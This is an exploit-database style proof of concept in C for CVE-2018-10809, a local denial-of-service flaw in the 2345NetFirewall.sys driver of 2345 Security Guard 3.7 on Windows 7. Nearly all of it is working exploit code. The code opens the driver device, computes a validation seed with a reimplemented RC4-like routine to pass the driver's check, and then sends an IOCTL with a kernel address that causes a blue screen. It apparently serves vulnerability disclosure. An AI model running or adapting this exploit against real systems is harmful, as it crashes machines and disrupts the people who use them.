2345 Security Guard 3.7 Denial Of Service

`# Exploit Title: 2345 Security Guard 3.7 - Denial of Service  
# Date: 2018-05-08  
# Exploit Author: anhkgg  
# Vendor Homepage: http://safe.2345.cc/  
# Software Link: http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe  
# Version: v3.7  
# Tested on: Windows 7 x86  
# CVE : CVE-2018-10809  
#  
# BSOD caused of 2345NetFirewall.sys because of not validating input valuesi1/4test version 3.7 on windows 7 x86 platform  
#  
#  
  
#include <windows.h>  
#include <stdio.h>  
  
struct NETFW_IOCTL_ADD_PID  
{  
DWORD pid;  
char seed[0x14];//  
};//0x18  
  
struct NETFW_IOCTL_SET_PID  
{  
BYTE set_state;//   
BYTE unk;//1  
WORD buf_len;//2  
DWORD pid;//4  
char buf[0x64];//8  
};//6c  
  
struct NETFW_IOCTL_222040  
{  
DWORD* ptr;  
DWORD size;  
};//  
  
int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)  
{  
int result;   
  
*a1 ^= *a2;  
*a2 ^= *a1;  
result = (unsigned __int8)*a2;  
*a1 ^= result;  
return result;  
}  
  
int __stdcall sub_12A80(char *a1, int len, char *a3)  
{  
int result;  
unsigned __int8 v4;  
__int16 i;  
__int16 j;  
unsigned __int8 k;   
  
for ( i = 0; i < 256; ++i )  
a3[i] = i;  
a3[256] = 0;  
a3[257] = 0;  
k = 0;  
v4 = 0;  
result = 0;  
for ( j = 0; j < 256; ++j )  
{  
v4 += a3[j] + a1[k];  
f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);  
result = (k + 1) / len;  
k = (k + 1) % len;  
}  
return result;  
}  
  
char *__stdcall sub_12B60(char *a1, signed int len, char *a3)  
{  
char *result;  
__int16 i;   
unsigned __int8 v5;   
unsigned __int8 v6;  
  
v5 = a3[256];  
v6 = a3[257];  
for ( i = 0; i < len; ++i )  
{  
v6 += a3[++v5];  
f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]);  
a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])];  
}  
a3[256] = v5;  
result = a3;  
a3[257] = v6;  
return result;  
}  
  
void calc_seed(char* seed, char* dst)  
{  
char Source1[26] = {0};  
char a3[300] = {0};  
  
Source1[0] = 8;  
Source1[1] = 14;  
Source1[2] = 8;  
Source1[3] = 10;  
Source1[4] = 2;  
Source1[5] = 3;  
Source1[6] = 29;  
Source1[7] = 23;  
Source1[8] = 13;  
Source1[9] = 3;  
Source1[10] = 15;  
Source1[11] = 22;  
Source1[12] = 15;  
Source1[13] = 7;  
Source1[14] = 91;  
Source1[15] = 4;  
Source1[16] = 18;  
Source1[17] = 26;  
Source1[18] = 26;  
Source1[19] = 3;  
Source1[20] = 4;  
Source1[21] = 1;  
Source1[22] = 15;  
Source1[23] = 25;  
Source1[24] = 10;  
Source1[25] = 13;  
  
sub_12A80(seed, 0x14, a3);   
sub_12B60(Source1, 0x1A, a3);  
memcpy(dst, Source1, 26);  
}  
  
int poc_2345NetFirewall()  
{  
HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",  
GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,  
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);  
if(h == INVALID_HANDLE_VALUE) {  
printf("[-] Open device error: %d\n", GetLastError());  
return 1;  
}  
DWORD BytesReturned = 0;  
  
DWORD ctlcode = 0x222298;  
NETFW_IOCTL_ADD_PID add_pid = {0};  
add_pid.pid = GetCurrentProcessId();  
  
if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {  
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());  
}  
  
ctlcode = 0x2222A4;  
NETFW_IOCTL_SET_PID set_pid = {0};  
set_pid.pid = GetCurrentProcessId();  
set_pid.set_state = 1;  
  
calc_seed(add_pid.seed, set_pid.buf);  
set_pid.buf_len = 26;  
  
if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {  
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());  
}  
  
//BSOD  
ctlcode = 0x222040;  
NETFW_IOCTL_222040 buf_222040 = {0};  
buf_222040.size = 1;  
buf_222040.ptr = (DWORD*)0x80000000;  
if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {  
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());  
}  
  
return 0;  
}  
  
int main()  
{  
poc_2345NetFirewall();  
  
return 0;  
}  
  
  
`